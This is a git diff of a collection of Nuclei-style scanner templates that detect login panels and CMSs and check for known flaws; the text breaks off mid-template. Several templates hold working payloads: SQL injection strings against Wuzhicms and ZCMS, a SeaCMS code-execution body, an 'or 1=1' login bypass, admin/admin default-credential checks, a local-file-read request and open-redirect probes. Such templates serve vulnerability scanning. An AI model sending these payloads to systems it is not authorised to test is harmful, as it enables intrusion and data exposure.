b/poc/microsoft/opennms-web-console-9285.yaml index 6fb6dbebb8..fe1158ada1 100644 --- a/poc/microsoft/opennms-web-console-9285.yaml +++ b/poc/microsoft/opennms-web-console-9285.yaml @@ -1,5 +1,4 @@ id: opennms-web-console - info: name: OpenNMS web console author: DhiyaneshDk @@ -7,19 +6,16 @@ info: reference: - https://www.exploit-db.com/ghdb/5468 tags: panel,login - requests: - method: GET path: - "{{BaseURL}}/opennms/login.jsp" - matchers-condition: and matchers: - type: word words: - "OpenNMS Web Console" part: body - - type: status status: - 200 diff --git a/poc/microsoft/pandora-fms-console-9451.yaml b/poc/microsoft/pandora-fms-console-9451.yaml index 85c2281fe7..fb825ccc9d 100644 --- a/poc/microsoft/pandora-fms-console-9451.yaml +++ b/poc/microsoft/pandora-fms-console-9451.yaml @@ -3,7 +3,8 @@ info: name: Pandora FMS author: dhiyaneshDk severity: info - reference: https://www.exploit-db.com/ghdb/6827 + reference: + - https://www.exploit-db.com/ghdb/6827 tags: panel requests: - method: GET diff --git a/poc/microsoft/pbootcms-database-file-download-9469.yaml b/poc/microsoft/pbootcms-database-file-download-9469.yaml index 88da4df001..9781cd9421 100644 --- a/poc/microsoft/pbootcms-database-file-download-9469.yaml +++ b/poc/microsoft/pbootcms-database-file-download-9469.yaml @@ -1,4 +1,5 @@ id: pbootcms-database-file-download + info: name: PbootCMS v2.0.7 - pbootcms.db File Download author: ritikchaddha @@ -7,10 +8,12 @@ info: - https://xz.aliyun.com/t/7628 - https://www.cnblogs.com/0daybug/p/12786036.html tags: pbootcms,db,exposure,database,sqlite + requests: - method: GET path: - "{{BaseURL}}/data/pbootcms.db" + max-size: 20000 matchers-condition: and matchers: @@ -20,6 +23,7 @@ requests: - "PbootCMS" - "SQLite format 3" condition: and + - type: status status: - 200 diff --git a/poc/microsoft/plone-cms-detect-9608.yaml b/poc/microsoft/plone-cms-detect-9608.yaml index 08791ef3f5..706dc2bc2b 100644 --- a/poc/microsoft/plone-cms-detect-9608.yaml +++ b/poc/microsoft/plone-cms-detect-9608.yaml @@ -5,9 +5,9 @@ info: author: cyllective severity: info description: Detects Plone CMS - tags: tech,plone,cms reference: - https://github.com/plone/Products.CMFPlone + tags: tech,plone,cms requests: - method: GET diff --git a/poc/microsoft/rhymix-cms-detect-9879.yaml b/poc/microsoft/rhymix-cms-detect-9879.yaml index 2e2299fb4f..6314a0e45f 100644 --- a/poc/microsoft/rhymix-cms-detect-9879.yaml +++ b/poc/microsoft/rhymix-cms-detect-9879.yaml @@ -1,26 +1,22 @@ id: rhymix-cms-detect - info: name: Rhymix CMS Detect author: gy741 severity: info description: Detects Rhymix CMS + reference: + - https://github.com/rhymix/rhymix tags: tech,rhymix - reference: https://github.com/rhymix/rhymix - requests: - method: GET path: - "{{BaseURL}}" - matchers-condition: or matchers: - - type: word part: header words: - 'rx_sesskey1' - - type: word part: body words: diff --git a/poc/microsoft/saferoads-vms-login-9970.yaml b/poc/microsoft/saferoads-vms-login-9970.yaml index ae25e07dfe..7ff21d63ee 100644 --- a/poc/microsoft/saferoads-vms-login-9970.yaml +++ b/poc/microsoft/saferoads-vms-login-9970.yaml @@ -1,13 +1,10 @@ id: saferoads-vms-login - info: name: Saferoads VMS Login author: dhiyaneshDk severity: info - reference: - - https://www.exploit-db.com/ghdb/6941 - tags: panel - + tags: login + reference: https://www.exploit-db.com/ghdb/6941 requests: - method: GET path: @@ -15,4 +12,4 @@ requests: matchers: - type: word words: - - 'Saferoads VMS' \ No newline at end of file + - 'Saferoads VMS' diff --git a/poc/microsoft/samsung-wlan-ap-rce-10008.yaml b/poc/microsoft/samsung-wlan-ap-rce-10008.yaml index 801ec50137..3d2ab419f2 100644 --- a/poc/microsoft/samsung-wlan-ap-rce-10008.yaml +++ b/poc/microsoft/samsung-wlan-ap-rce-10008.yaml @@ -4,7 +4,8 @@ info: name: Samsung Wlan AP (WEA453e) RCE author: pikpikcu severity: critical - reference: https://iryl.info/2020/11/27/exploiting-samsung-router-wlan-ap-wea453e/ + reference: + - https://iryl.info/2020/11/27/exploiting-samsung-router-wlan-ap-wea453e/ tags: xss,samsung,rce requests: @@ -17,7 +18,7 @@ requests: matchers: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - "bin:.*:1:1" part: body diff --git a/poc/microsoft/seacms-rce-10102.yaml b/poc/microsoft/seacms-rce-10102.yaml index 54d215da6b..6a97e997d0 100644 --- a/poc/microsoft/seacms-rce-10102.yaml +++ b/poc/microsoft/seacms-rce-10102.yaml @@ -1,5 +1,4 @@ id: seacms-rce - info: name: SeaCMS V6.4.5 RCE author: pikpikcu @@ -8,13 +7,11 @@ info: reference: - https://mengsec.com/2018/08/06/SeaCMS-v6-45前台代码执行漏洞分析/ tags: seacms,rce - requests: - method: POST path: - '{{BaseURL}}/search.php?searchtype=5' body: "searchtype=5&order=}{end if} {if:1)phpinfo();if(1}{end if}" - matchers-condition: and matchers: - type: word diff --git a/poc/microsoft/tikiwiki-cms-10775.yaml b/poc/microsoft/tikiwiki-cms-10775.yaml index 8de91e3046..b36fe00e20 100644 --- a/poc/microsoft/tikiwiki-cms-10775.yaml +++ b/poc/microsoft/tikiwiki-cms-10775.yaml @@ -1,14 +1,17 @@ id: tikiwiki-cms + info: name: Tiki Wiki CMS Groupware author: chron0x severity: info - tags: panel + tags: panel,tikiwiki + requests: - method: GET path: - "{{BaseURL}}/tiki-login_scr.php" - "{{BaseURL}}/tiki-login.php" + matchers-condition: and matchers: - type: status diff --git a/poc/microsoft/weak-encryption-algorithms.yaml b/poc/microsoft/weak-encryption-algorithms.yaml new file mode 100644 index 0000000000..3287bb643b --- /dev/null +++ b/poc/microsoft/weak-encryption-algorithms.yaml @@ -0,0 +1,26 @@ +id: weak-encryption-algorithms + +info: + name: Weak Encryption Algorithms + author: YoruYagami + severity: medium + description: | + This template detects the use of weak encryption algorithms such as MD5 or SHA-1 in the source code. Weak encryption algorithms are vulnerable to attacks and should be replaced with stronger algorithms like SHA-256 or SHA-3. + remediation: | + To remediate this issue, replace weak encryption algorithms with stronger ones. Example: + + ```java + // Use SHA-256 instead of MD5 + MessageDigest digest = MessageDigest.getInstance("SHA-256"); + byte[] hash = digest.digest(input.getBytes(StandardCharsets.UTF_8)); + ``` + +file: + - extensions: + - java + + matchers: + - type: word + words: + - "MessageDigest.getInstance(\"MD5\")" + - "MessageDigest.getInstance(\"SHA-1\")" diff --git a/poc/microsoft/wems-manager-xss-11194.yaml b/poc/microsoft/wems-manager-xss-11194.yaml index 8b70fab0a9..40f9ddb9bb 100644 --- a/poc/microsoft/wems-manager-xss-11194.yaml +++ b/poc/microsoft/wems-manager-xss-11194.yaml @@ -1,12 +1,12 @@ id: wems-manager-xss info: - name: WEMS Enterprise Manager - Cross-Site Scripting + name: WEMS Enterprise Manager XSS author: pikpikcu severity: medium + tags: xss description: A vulnerability in WEMS Enterprise Manager allows remote attackers to inject arbitrary Javascript into the response return by the server by sending it to the '/guest/users/forgotten' endpoint and the 'email' parameter. reference: - https://packetstormsecurity.com/files/155777/WEMS-Enterprise-Manager-2.58-Cross-Site-Scripting.html - tags: xss requests: - method: GET path: diff --git a/poc/microsoft/wp-arforms-listing-11415.yaml b/poc/microsoft/wp-arforms-listing-11415.yaml index 32df4d1c94..e223f9ef7d 100644 --- a/poc/microsoft/wp-arforms-listing-11415.yaml +++ b/poc/microsoft/wp-arforms-listing-11415.yaml @@ -1,5 +1,4 @@ id: wp-arforms-listing - info: name: WordPress Plugin Arforms Listing author: pussycat0x @@ -8,23 +7,17 @@ info: reference: - https://www.exploit-db.com/ghdb/6424 tags: wordpress,listing,plugin - requests: - - method: GET path: - "{{BaseURL}}/wp-content/plugins/arforms/" - matchers-condition: and - matchers: - type: word words: - "Index of" - "wp-content/plugins/arforms/" condition: and - - type: status - status: - 200 diff --git a/poc/microsoft/wp-super-forms-11585.yaml b/poc/microsoft/wp-super-forms-11585.yaml index f00d7a8dbc..d9003227fd 100644 --- a/poc/microsoft/wp-super-forms-11585.yaml +++ b/poc/microsoft/wp-super-forms-11585.yaml @@ -1,11 +1,11 @@ id: wordpress-super-forms info: - name: WordPress super-forms + name: WordPress super-forms Plugin Directory Listing author: pussycat0x severity: low description: Searches for sensitive directories present in the wordpress-plugins plugin. reference: https://www.exploit-db.com/ghdb/6776 - tags: wordpress,listing + tags: wordpress,listing,plugin requests: - method: GET path: diff --git a/poc/microsoft/wuzhicms-sqli-11659.yaml b/poc/microsoft/wuzhicms-sqli-11659.yaml index 8d01741348..2fea61f35d 100644 --- a/poc/microsoft/wuzhicms-sqli-11659.yaml +++ b/poc/microsoft/wuzhicms-sqli-11659.yaml @@ -1,4 +1,5 @@ id: wuzhicms-sqli + info: name: Wuzhicms v4.1.0 SQL Injection author: princechaddha @@ -6,18 +7,19 @@ info: reference: - https://github.com/wuzhicms/wuzhicms/issues/184 tags: wuzhicms,sqli -variables: - num: "999999999" + requests: - method: GET path: - - "{{BaseURL}}/api/sms_check.php?param=1%27%20and%20updatexml(1,concat(0x7e,(SELECT%20MD5({{num}})),0x7e),1)--%20" + - "{{BaseURL}}/api/sms_check.php?param=1%27%20and%20updatexml(1,concat(0x7e,(SELECT%20MD5(1234)),0x7e),1)--%20" matchers-condition: and matchers: - - type: word - words: - - '{{md5({{num}})}}' - part: body - type: status status: - 200 + - type: word + words: + - "81dc9bdb52d04dc20036dbd8313ed05" + - "sql_error:MySQL Query Error" + part: body + condition: and diff --git a/poc/microsoft/zcms-v3-sqli-11775.yaml b/poc/microsoft/zcms-v3-sqli-11775.yaml index a7084a23d3..61c4b5440d 100644 --- a/poc/microsoft/zcms-v3-sqli-11775.yaml +++ b/poc/microsoft/zcms-v3-sqli-11775.yaml @@ -1,4 +1,5 @@ id: zcms-v3-sqli + info: name: ZCMS SQL Injection author: princechaddha @@ -6,18 +7,17 @@ info: reference: - https://www.anquanke.com/post/id/183241 tags: zcms,sqli -variables: - num: "999999999" + requests: - method: GET path: - - "{{BaseURL}}/admin/cms_channel.php?del=123456+AND+(SELECT+1+FROM(SELECT+COUNT(*)%2cCONCAT(0x7e%2cmd5({{num}})%2c0x7e%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)--%2b'" + - "{{BaseURL}}/admin/cms_channel.php?del=123456+AND+(SELECT+1+FROM(SELECT+COUNT(*)%2cCONCAT(0x7e%2cmd5(202072102)%2c0x7e%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)--%2b'" matchers-condition: and matchers: - - type: word - words: - - '{{md5({{num}})}}' - part: body - type: status status: - 200 + - type: word + words: + - "6f7c6dcbc380aac3bcba1f9fccec991e" + part: body diff --git a/poc/microsoft/zms-auth-bypass-11832.yaml b/poc/microsoft/zms-auth-bypass-11832.yaml index 6c0bd3f73f..86b727fd15 100644 --- a/poc/microsoft/zms-auth-bypass-11832.yaml +++ b/poc/microsoft/zms-auth-bypass-11832.yaml @@ -1,4 +1,5 @@ id: zms-auth-bypass + info: name: Zoo Management System 1.0 - Authentication Bypass author: dwisiswant0 @@ -7,6 +8,7 @@ info: reference: - https://www.exploit-db.com/exploits/48880 tags: auth-bypass,zms + requests: - raw: - | @@ -19,6 +21,7 @@ requests: Cookie: PHPSESSID={{randstr}} username=dw1%27+or+1%3D1+%23&password=dw1%27+or+1%3D1+%23&login= + redirects: true max-redirects: 1 matchers-condition: and diff --git a/poc/mongodb/mongodb-detect-8921.yaml b/poc/mongodb/mongodb-detect-8921.yaml index a81bd83ef0..9e08d299ab 100644 --- a/poc/mongodb/mongodb-detect-8921.yaml +++ b/poc/mongodb/mongodb-detect-8921.yaml @@ -3,8 +3,7 @@ info: name: MongoDB Detection author: pdteam severity: info - reference: - - https://github.com/orleven/Tentacle + reference: https://github.com/orleven/Tentacle tags: network,mongodb network: - inputs: diff --git a/poc/mongodb/mongodb-unauth-8925.yaml b/poc/mongodb/mongodb-unauth-8925.yaml index 469fd95eb9..9883dc2bca 100644 --- a/poc/mongodb/mongodb-unauth-8925.yaml +++ b/poc/mongodb/mongodb-unauth-8925.yaml @@ -1,14 +1,21 @@ id: mongodb-unauth + info: name: Unauth MongoDB Disclosure author: pdteam severity: high - reference: https://github.com/orleven/Tentacle + reference: + - https://github.com/orleven/Tentacle + - https://book.hacktricks.xyz/pentesting/27017-27018-mongodb + - https://www.mongodb.com/features/mongodb-authentication + remediation: Enable Authentication in MongoDB tags: network,mongodb,unauth + network: - inputs: - data: 480000000200000000000000d40700000000000061646d696e2e24636d6400000000000100000021000000026765744c6f670010000000737461727475705761726e696e67730000 type: hex + host: - "{{Hostname}}" - "{{Host}}:27017" diff --git a/poc/mongodb/rockmongo-default-login-9897.yaml b/poc/mongodb/rockmongo-default-login-9897.yaml index d1164252a3..5e22fa91ad 100644 --- a/poc/mongodb/rockmongo-default-login-9897.yaml +++ b/poc/mongodb/rockmongo-default-login-9897.yaml @@ -1,17 +1,18 @@ id: rockmongo-default-login + info: name: Rockmongo Default Login author: pikpikcu severity: high description: Rockmongo default admin credentials were discovered. - tags: rockmongo,default-login reference: - https://serverfault.com/questions/331315/how-to-change-the-default-admin-username-and-admin-password-in-rockmongo classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 - cve-id: cwe-id: CWE-522 + tags: rockmongo,default-login + requests: - raw: - | @@ -21,19 +22,23 @@ requests: Referer: {{Hostname}}/index.php?action=login.index more=0&host=0&username={{username}}&password={{password}}&db=&lang=en_us&expire=3 + payloads: username: - admin password: - admin attack: pitchfork + matchers-condition: and matchers: + - type: word words: - "Location: /index.php?action=admin.index&host=0" - "Set-Cookie: ROCK_LANG=" part: header + - type: status status: - 302 diff --git a/poc/mysql/exposed-mysql-initial-7324.yaml b/poc/mysql/exposed-mysql-initial-7324.yaml index f644e79c49..3df4611d59 100644 --- a/poc/mysql/exposed-mysql-initial-7324.yaml +++ b/poc/mysql/exposed-mysql-initial-7324.yaml @@ -4,7 +4,8 @@ info: name: Exposed mysql.initial author: ELSFA7110 severity: info - reference: https://hackerone.com/reports/1081817 + reference: + - https://hackerone.com/reports/1081817 tags: config,exposure requests: diff --git a/poc/netlify/netlify-takeover-9042.yaml b/poc/netlify/netlify-takeover-9042.yaml index de63606ff8..973635bbcd 100644 --- a/poc/netlify/netlify-takeover-9042.yaml +++ b/poc/netlify/netlify-takeover-9042.yaml @@ -1,25 +1,20 @@ id: netlify-takeover - info: name: netlify takeover detection - author: 0xPrial,pdteam + author: pdcommunity severity: high - reference: - - https://github.com/EdOverflow/can-i-take-over-xyz - tags: takeover,netlify - + tags: takeover + reference: https://github.com/EdOverflow/can-i-take-over-xyz requests: - method: GET path: - "{{BaseURL}}" - matchers-condition: and matchers: - type: word words: - - "Not found - Request ID:" - + - "Not Found" - type: word words: - - "Netlify" + - "server: Netlify" part: header diff --git a/poc/nginx/nginx-vhost-traffic-status-9124.yaml b/poc/nginx/nginx-vhost-traffic-status-9124.yaml old mode 100755 new mode 100644 index f6f6f728ca..68513517c9 --- a/poc/nginx/nginx-vhost-traffic-status-9124.yaml +++ b/poc/nginx/nginx-vhost-traffic-status-9124.yaml @@ -1,17 +1,15 @@ id: nginx-vhost-traffic-status - info: name: Nginx Vhost Traffic Status author: geeknik - reference: https://github.com/vozlt/nginx-module-vts severity: low + reference: + - https://github.com/vozlt/nginx-module-vts tags: status,nginx,misconfig - requests: - method: GET path: - "{{BaseURL}}/status" - matchers-condition: and matchers: - type: word diff --git a/poc/nodejs/express-lfr (copy 1).yaml b/poc/nodejs/express-lfr (copy 1).yaml index 4c9b265994..d41e61b9a5 100644 --- a/poc/nodejs/express-lfr (copy 1).yaml +++ b/poc/nodejs/express-lfr (copy 1).yaml @@ -1,10 +1,8 @@ id: Express-LFR-json - info: name: LFR in Express via json - author: mors_3_c + author: nithissh severity: medium - requests: - method: POST path: @@ -19,22 +17,22 @@ requests: status: - 500 - type: word - words: + words: - "X-Powered-By: Express" - part: header + part: header - type: word words: - "ENOENT: no such file or directory" - # matchers-condition: or - # matchers: - # - type: status - # status: - # - 500 - # - type: word - # words: - # - "X-Powered-By: Express" - # part: header - # - type: word - # words: - # - "ENOENT: no such file or directory" \ No newline at end of file +# matchers-condition: or +# matchers: +# - type: status +# status: +# - 500 +# - type: word +# words: +# - "X-Powered-By: Express" +# part: header +# - type: word +# words: +# - "ENOENT: no such file or directory" diff --git a/poc/nodejs/express-lfr-json.yaml b/poc/nodejs/express-lfr-json.yaml new file mode 100644 index 0000000000..4c9b265994 --- /dev/null +++ b/poc/nodejs/express-lfr-json.yaml @@ -0,0 +1,40 @@ +id: Express-LFR-json + +info: + name: LFR in Express via json + author: mors_3_c + severity: medium + +requests: + - method: POST + path: + - "{{BaseURL}}" + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0 + Content-Type: application/json + body: "{\"profile\":{\"layout\": \"./../routes/indfsfdsdex.js\"}}" + matchers-condition: or + matchers: + - type: status + status: + - 500 + - type: word + words: + - "X-Powered-By: Express" + part: header + - type: word + words: + - "ENOENT: no such file or directory" + + # matchers-condition: or + # matchers: + # - type: status + # status: + # - 500 + # - type: word + # words: + # - "X-Powered-By: Express" + # part: header + # - type: word + # words: + # - "ENOENT: no such file or directory" \ No newline at end of file diff --git a/poc/nodejs/kube-api-nodes-8507.yaml b/poc/nodejs/kube-api-nodes-8507.yaml index 8e44c71d24..29b885b67e 100644 --- a/poc/nodejs/kube-api-nodes-8507.yaml +++ b/poc/nodejs/kube-api-nodes-8507.yaml @@ -1,7 +1,7 @@ id: kube-api-nodes info: name: Kube API Nodes - author: sharath + author: sharath,ritikchaddha severity: info description: Scans for kube nodes tags: tech,k8s,kubernetes,devops,kube @@ -9,14 +9,17 @@ requests: - method: GET path: - "{{BaseURL}}/api/v1/nodes" - matchers-condition: and + matchers-condition: or matchers: - - type: status - status: - - 200 - type: word part: body words: - '"NodeList":' - '"items":' condition: and + - type: word + part: body + words: + - '"containerRuntimeVersion"' + - '"kubeletVersion": "v' + condition: and diff --git a/poc/nodejs/node-integration-enabled-9137.yaml b/poc/nodejs/node-integration-enabled-9137.yaml index c4b2571087..4cde7dd49b 100644 --- a/poc/nodejs/node-integration-enabled-9137.yaml +++ b/poc/nodejs/node-integration-enabled-9137.yaml @@ -1,14 +1,13 @@ id: node-integration-enabled info: - name: Electron Applications - Cross-Site Scripting & Remote Code Execution + name: Node Integration Enabled author: me9187 severity: critical - description: | - Electron Applications is susceptible to remote code execution by way of cross-site scripting via nodeIntegration by calling require('child_process').exec('COMMAND');. reference: - https://blog.yeswehack.com/yeswerhackers/exploitation/pentesting-electron-applications/ - https://book.hacktricks.xyz/pentesting/pentesting-web/xss-to-rce-electron-desktop-apps tags: electron,file,nodejs + # nodeIntegration in Electron Applications means you can turn XSS into RCE by calling require('child_process').exec('COMMAND'); file: - extensions: - all @@ -16,5 +15,3 @@ file: - type: word words: - "nodeIntegration: true" - -# Enhanced by mp on 2022/05/19 diff --git a/poc/open_redirect/drupal-user-enum-redirect-7112.yaml b/poc/open_redirect/drupal-user-enum-redirect-7112.yaml new file mode 100644 index 0000000000..d004bb85be --- /dev/null +++ b/poc/open_redirect/drupal-user-enum-redirect-7112.yaml @@ -0,0 +1,33 @@ +id: drupal-user-enum-redirect + +info: + name: Drupal User Enumration [Redirect] + author: 0w4ys + severity: info + tags: drupal + +requests: + - method: GET + path: + - "{{BaseURL}}/user/0" + - "{{BaseURL}}/user/1" + - "{{BaseURL}}/user/2" + - "{{BaseURL}}/user/3" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Location: http(s|):\/\/[\w\.\-]+(\/ar|\/en|)\/users\/\w+' + part: header + + - type: status + status: + - 301 + + extractors: + - type: regex + part: header + regex: + - 'users\/\w+' diff --git a/poc/open_redirect/homeautomation-v3-openredirect-7986.yaml b/poc/open_redirect/homeautomation-v3-openredirect-7986.yaml index dc8c03885a..ec8810b24a 100644 --- a/poc/open_redirect/homeautomation-v3-openredirect-7986.yaml +++ b/poc/open_redirect/homeautomation-v3-openredirect-7986.yaml @@ -4,7 +4,8 @@ info: author: 0x_Akoko severity: medium description: A vulnerability in the HomeAutomation product allows remote unauthenticated attackers to inject a redirect URL via the 'api.php' endpoint and the 'redirect' parameter. - reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5559.php + reference: + - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5559.php tags: iot,redirect requests: - method: GET diff --git a/poc/open_redirect/httpbin-open-redirect-8049.yaml b/poc/open_redirect/httpbin-open-redirect-8049.yaml index 961d4ae06f..08aff96109 100644 --- a/poc/open_redirect/httpbin-open-redirect-8049.yaml +++ b/poc/open_redirect/httpbin-open-redirect-8049.yaml @@ -15,13 +15,13 @@ info: requests: - method: GET path: - - "{{BaseURL}}/redirect-to?url=https%3A%2F%2Finteract.sh" + - "{{BaseURL}}/redirect-to?url=https%3A%2F%2Fexample.com" matchers-condition: and matchers: - type: dsl dsl: - - 'location == "https://interact.sh"' + - 'location == "https://example.com"' - type: status status: diff --git a/poc/open_redirect/newsletter-open-redirect-9078.yaml b/poc/open_redirect/newsletter-open-redirect-9078.yaml index 986f6ae231..2960aceaa6 100644 --- a/poc/open_redirect/newsletter-open-redirect-9078.yaml +++ b/poc/open_redirect/newsletter-open-redirect-9078.yaml @@ -1,22 +1,26 @@ id: newsletter-open-redirect + info: name: WordPress Newsletter Manager < 1.5 - Unauthenticated Open Redirect author: dhiyaneshDk severity: medium - description: WordPress Newsletter Manager < 1.5 is susceptible to an open redirect vulnerability. The plugin used base64 encoded user input in the appurl parameter without validation to redirect users using the header() PHP function, leading to an open redirect issue. + description: WordPress Newsletter Manager < 1.5 is susceptible to an open redirect vulnerability. The plugin used base64 encoded user input in the appurl parameter without validation to redirect users using the + header() PHP function, leading to an open redirect issue. reference: - https://wpscan.com/vulnerability/847b3878-da9e-47d6-bc65-3cfd2b3dc1c1 classification: cwe-id: CWE-601 tags: wordpress,redirect,wp-plugin,newsletter,wp + requests: - method: GET path: - - "{{BaseURL}}/?wp_nlm=confirmation&appurl=aHR0cDovL2ludGVyYWN0LnNo" + - "{{BaseURL}}/?wp_nlm=confirmation&appurl=aHR0cHM6Ly9leGFtcGxlLmNvbQ==" + matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 # Enhanced by mp on 2022/04/13 diff --git a/poc/open_redirect/office365-open-redirect-9214.yaml b/poc/open_redirect/office365-open-redirect-9214.yaml index 70ac3cab60..e7dbaa63cf 100644 --- a/poc/open_redirect/office365-open-redirect-9214.yaml +++ b/poc/open_redirect/office365-open-redirect-9214.yaml @@ -1,25 +1,20 @@ id: office365-open-redirect - info: name: Office365 Open Redirect From Autodiscover author: dhiyaneshDk severity: low - reference: - - https://medium.com/@heinjame/office365-open-redirect-from-autodiscover-64284d26c168 + reference: https://medium.com/@heinjame/office365-open-redirect-from-autodiscover-64284d26c168 tags: redirect,office365,microsoft - requests: - method: GET path: - "{{BaseURL}}/autodiscover/autodiscover.json/v1.0/{{randstr}}@interact.sh?Protocol=Autodiscoverv1" - matchers-condition: and matchers: - type: word part: header words: - "autodiscover.interact.sh" - - type: status status: - 302 diff --git a/poc/open_redirect/pieregister-open-redirect-9578.yaml b/poc/open_redirect/pieregister-open-redirect-9578.yaml index 1696507595..0e52f45804 100644 --- a/poc/open_redirect/pieregister-open-redirect-9578.yaml +++ b/poc/open_redirect/pieregister-open-redirect-9578.yaml @@ -1,26 +1,19 @@ id: pieregister-open-redirect - info: - name: WordPress Pie Register < 3.7.2.4 - Open Redirect - author: 0x_Akoko + name: Pie Register < 3.7.2.4 - Open Redirect severity: low - description: WordPress Pie Register < 3.7.2.4 is susceptible to an open redirect vulnerability because the plugin passes unvalidated user input to the wp_redirect() function. + author: 0x_Akoko + description: The plugin passes unvalidated user input to the wp_redirect() function, without validating it, leading to an Open redirect issue. reference: - https://wpscan.com/vulnerability/f6efa32f-51df-44b4-bbba-e67ed5785dd4 - https://wordpress.org/plugins/pie-register/ - classification: - cwe-id: CWE-601 tags: wordpress,redirect,wp-plugin,pieregister - requests: - method: GET path: - "{{BaseURL}}/?piereg_logout_url=true&redirect_to=https://example.com" - matchers: - type: regex part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' - -# Enhanced by mp on 2022/04/13 diff --git a/poc/open_redirect/ultimatemember-open-redirect-10877.yaml b/poc/open_redirect/ultimatemember-open-redirect-10877.yaml index 15b5ff1e30..3f9f72048e 100644 --- a/poc/open_redirect/ultimatemember-open-redirect-10877.yaml +++ b/poc/open_redirect/ultimatemember-open-redirect-10877.yaml @@ -4,14 +4,15 @@ info: author: 0x_Akoko severity: medium description: The Ultimate Member WordPress plugin was vulnerable to an Unauthenticated Open Redirect vulnerability, affecting the registration and login pages where the "redirect_to" GET parameter was used. - reference: https://wpscan.com/vulnerability/97823f41-7614-420e-81b8-9e735e4c203f + reference: + - https://wpscan.com/vulnerability/97823f41-7614-420e-81b8-9e735e4c203f tags: wp-plugin,redirect,wordpress requests: - method: GET path: - - "{{BaseURL}}/register/?redirect_to=https://example.com/" + - "{{BaseURL}}/register/?redirect_to=https://interact.sh/" matchers: - type: regex regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' part: header diff --git a/poc/open_redirect/wordpress-redirection-plugin-listing-11306.yaml b/poc/open_redirect/wordpress-redirection-plugin-listing-11306.yaml index 116e5709c7..42254c8a52 100644 --- a/poc/open_redirect/wordpress-redirection-plugin-listing-11306.yaml +++ b/poc/open_redirect/wordpress-redirection-plugin-listing-11306.yaml @@ -4,7 +4,8 @@ info: author: dhiyaneshDk severity: info description: Searches for sensitive directories present in the wordpress-redirection plugin. - reference: https://www.exploit-db.com/ghdb/6436 + reference: + - https://www.exploit-db.com/ghdb/6436 tags: wordpress,listing,plugin requests: - method: GET diff --git a/poc/open_redirect/wp-prostore-open-redirect-11548.yaml b/poc/open_redirect/wp-prostore-open-redirect-11548.yaml index a94618bc3b..820d21e476 100644 --- a/poc/open_redirect/wp-prostore-open-redirect-11548.yaml +++ b/poc/open_redirect/wp-prostore-open-redirect-11548.yaml @@ -1,4 +1,5 @@ id: wp-prostore-open-redirect + info: name: WordPress ProStore Themes 1.1.2 Open Redirection author: 0x_Akoko @@ -7,12 +8,14 @@ info: reference: - https://wpscan.com/vulnerability/2e0f8b7f-96eb-443c-a553-550e42ec67dc tags: wordpress,wp-theme,redirect + requests: - method: GET path: - "{{BaseURL}}/wp-content/themes/prostore/go.php?https://example.com/" + matchers: - type: regex regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' - part: header + part: header \ No newline at end of file diff --git a/poc/open_redirect/wptouch-open-redirect-11594.yaml b/poc/open_redirect/wptouch-open-redirect-11594.yaml index 2468d968b4..c33b1c8765 100644 --- a/poc/open_redirect/wptouch-open-redirect-11594.yaml +++ b/poc/open_redirect/wptouch-open-redirect-11594.yaml @@ -1,4 +1,5 @@ id: wptouch-open-redirect + info: name: WPTouch Switch Desktop 3.x Open Redirection author: 0x_Akoko @@ -14,10 +15,12 @@ info: reference: - https://cxsecurity.com/issue/WLB-2020030114 tags: wp-plugin,redirect,wordpress + requests: - method: GET path: - "{{BaseURL}}/?wptouch_switch=desktop&redirect=https://example.com/" + matchers: - type: regex regex: diff --git a/poc/oracle/oracle-dbcs-9355.yaml b/poc/oracle/oracle-dbcs-9355.yaml index 4dd45891c6..11ebe4ceb0 100644 --- a/poc/oracle/oracle-dbcs-9355.yaml +++ b/poc/oracle/oracle-dbcs-9355.yaml @@ -1,23 +1,24 @@ -id: oracle-dbcs -info: - name: Oracle Database as a Service - author: pussycat0x - severity: info - reference: https://www.shodan.io/search?query=http.title%3A%22Oracle+Database+as+a+Service%22 - tags: oracle,tech - -requests: - - method: GET - path: - - '{{BaseURL}}' - - matchers-condition: and - matchers: - - type: word - words: - - 'Oracle Database as a Service' - part: body - - - type: status - status: - - 200 +id: oracle-dbcs + +info: + name: Oracle Database as a Service + author: pussycat0x + severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22Oracle+Database+as+a+Service%22 + tags: oracle,tech + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - 'Oracle Database as a Service' + part: body + + - type: status + status: + - 200 diff --git a/poc/oracle/oracle-ebs-bispgraph-file-access-9357.yaml b/poc/oracle/oracle-ebs-bispgraph-file-access-9357.yaml index d9acbf4aae..d762be0940 100644 --- a/poc/oracle/oracle-ebs-bispgraph-file-access-9357.yaml +++ b/poc/oracle/oracle-ebs-bispgraph-file-access-9357.yaml @@ -1,14 +1,20 @@ id: oracle-ebs-bispgrapgh-file-read info: name: Oracle EBS Bispgraph File Access - author: "Alfie Njeru (@emenalf) - 